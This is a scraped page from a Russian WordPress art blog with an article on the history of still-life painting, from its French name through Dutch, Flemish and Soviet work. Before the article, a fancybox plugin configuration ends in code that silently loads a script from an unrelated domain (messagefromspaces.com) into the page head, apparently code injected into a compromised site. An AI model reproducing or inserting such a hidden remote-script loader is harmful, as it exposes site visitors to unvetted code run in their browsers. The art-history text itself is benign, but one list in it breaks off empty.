, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Натюрморт

Автор: Дмитрий Алмазов | 31 Мар 2015

Натюрморт является одним из основных жанров изобразительного искусства.

Уходя своими корнями во Францию, этот вид живописи показывает неодушевленные предметы (от франц. nature morte - “мертвая природа”), объединенные в одну общую композицию.

Натюрморт имеет довольно много значений в общей композиции картины: с одной стороны он может выступать самостоятельно во всей полноте композиции, но с другой стороны может быть и составной частью какой-либо главной композиции картины или портрета.

В конечном итоге все сводится к задаче, которую ставит художник перед собой.

Не смотря на свою простоту, натюрморт обладает довольно сильным воздействием на зрителя, в нем показывается не только внешняя вещественная сущность предметов, но и могут быть переданы существенные стороны жизни, эпохи и даже какие-либо исторические события.

Первые напоминания о натюрморте можно отнести к XV-XVI векам, когда его считали исторической (жанровой) композиции. Долгое время являясь частью религиозного искусства, натюрморт использовался для обрамления фигур святых. Также он использовался для украшений стенок шкафов и другой мебели.

В XVII веке натюрморт сформировывается как самостоятельный жанр в творчестве голландских и фламандских художников. Все труды того времени наполнены аллегорией “смерть неизбежно настигнет всех”.

Что касается развития натюрморта, как самостоятельного жанра, в России, то первое упоминание о нем датируется XVIII веком, когда его связывали с изображением даров моря или земли и всего что окружает человека в повседневной жизни. Но до XIX века включительно натюрморт относили к “низшему жанру”. И только начало ХХ века стало расцветом русской натюрмортной живописи, когда она впервые встала в один ряд с прочими жанрами. Обогатившись новыми темами, образами и художественными приемами, русский натюрморт развивался с огромной скоростью: от импрессионизма до абстрактного формотворчества.

Натюрморт с грушейВ 30-40-е годы ХХ столетия это развитие замедлилось, но уже с середины 50-х годов натюрморт переживает в советской живописи новый подъем и с этого времени окончательно и твердо встает вровень с другими жанрами.

Если рассматривать натюрморт XX-XXI веков, то можно выделить следующие направления:

Таким образом натюрморт, являясь одним из главных жанров искусства, для каждого зрителя раскрывает свою сущность, в зависимости от воображения.

Темы: Изобразительное искусство, Школа искусства, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress